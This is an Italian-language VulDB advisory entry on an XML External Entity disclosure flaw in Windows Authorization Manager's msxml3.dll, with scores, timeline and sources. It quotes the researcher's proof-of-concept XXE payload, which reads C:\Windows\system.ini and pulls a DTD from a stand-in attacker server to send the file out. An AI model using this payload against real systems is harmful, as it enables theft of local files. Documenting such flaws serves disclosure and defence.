Microsoft Windows Authorization Manager msxml3.dll File rivelazione di un 'informazione

CVSS Punteggio Meta TempExploit Prezzo Attuale (≈)Punteggio di interesse CTI
4.8$0-$5k0.00

Una vulnerabilità di livello problematico è stata rilevata in Microsoft Windows (Operating System). É interessato una funzione sconosciuta nella libreria msxml3.dll del componente Authorization Manager. Per causa della manipolazione di un input sconosciuto se causa una vulnerabilità di classe rivelazione di un 'informazione. Gli effetti sono noti per la riservatezza.

La vulnerabilità è stata pubblicata in data 04/12/2016 da John Page (hyp3rlinx) con identificazione Microsoft Authorization Manager "azman" XML External Entity con un mailinglist post (Full-Disclosure) (non definito). L'advisory è scaricabile da seclists.org. La pubblicazione è stata coordinata con il produttore. Dalla rete può partire l'attacco. L'utilizzo non richiede alcuna forma di autentificazione. I dettagli tecnici e un pubblico metodo di utilizzo sono conosciuti.

Un metodo di utilizzo è stato sviluppato da John Page (hyp3rlinx) ed è stata pubblicata immediatamente dopo il comunicato. L'exploit è scaricabile da seclists.org. È stato dichiarato come proof-of-concept. Per almeno 96 giorni, questa vulnerabilità è stata classificata come 0-day exploit. Il codice utilizzato dal exploit è:

<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://attacker-server:8080/payload.dtd";>
%dtd;]>
<pwn>&send;</pwn>

Informazioni riguardo una possibile contromisura non sono al momento disponibili. Si suggerisce di sostituire il prodotto con uno equivalente.

Prodottoinfo

Genere

Fornitore

Nome

Licenza

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍

CVSSv3info

VulDB Punteggio meta-base: 5.3
VulDB Punteggio Meta Temp: 4.8

VulDB Punteggio di base: 5.3
VulDB Punteggio temporaneo: 4.8
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VettoreComplessitàAutenticazioneRiservatezzaIntegritàDisponibilità
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare

VulDB Punteggio di base: 🔍
VulDB Punteggio temporaneo: 🔍
VulDB Affidabilità: 🔍

Exploitinginfo

Nome: File
Classe: Rivelazione di un 'informazione / File
CWE: CWE-200 / CWE-284 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍

Locale: No
Remoto: Si

Disponibilità: 🔍
Accesso: Pubblico
Stato: Proof-of-Concept
Autore: John Page (hyp3rlinx)
Scaricamento: 🔍
Previsione dei prezzi: 🔍
Preventivo attuale: 🔍

0-Daysbloccaresbloccaresbloccaresbloccare
Oggisbloccaresbloccaresbloccaresbloccare

Intelligence Sulle Minacceinfo

Interesse: 🔍
Attori Attivi: 🔍
Gruppi APT attivi: 🔍

Contromisureinfo

Raccomandazione: nessuna contromisura conosciuta
Stato: 🔍

0 giorni di tempo: 🔍
Sfrutta il tempo di ritardo: 🔍

Sequenza temporaleinfo

30/08/2016 🔍
30/08/2016 +0 giorni 🔍
04/12/2016 +96 giorni 🔍
04/12/2016 +0 giorni 🔍
05/12/2016 +1 giorni 🔍
24/07/2019 +961 giorni 🔍

Fontiinfo

Fornitore: microsoft.com
Prodotto: microsoft.com

Advisory: Microsoft Authorization Manager "azman" XML External Entity
Riceratore: John Page (hyp3rlinx)
Stato: Non definito
Coordinato: 🔍
scip Labs: https://www.scip.ch/en/?labs.20161013
Vedi anche: 🔍

Voceinfo

Data di creazione: 05/12/2016 21:47
Aggiornamenti: 24/07/2019 17:00
I cambiamenti: 05/12/2016 21:47 (55), 24/07/2019 17:00 (2)
Completa: 🔍

Discussione

Ancora nessun commento. Le Lingue: it + en.

Effettua il login per commentare.

Do you need the next level of professionalism?

Upgrade your account now!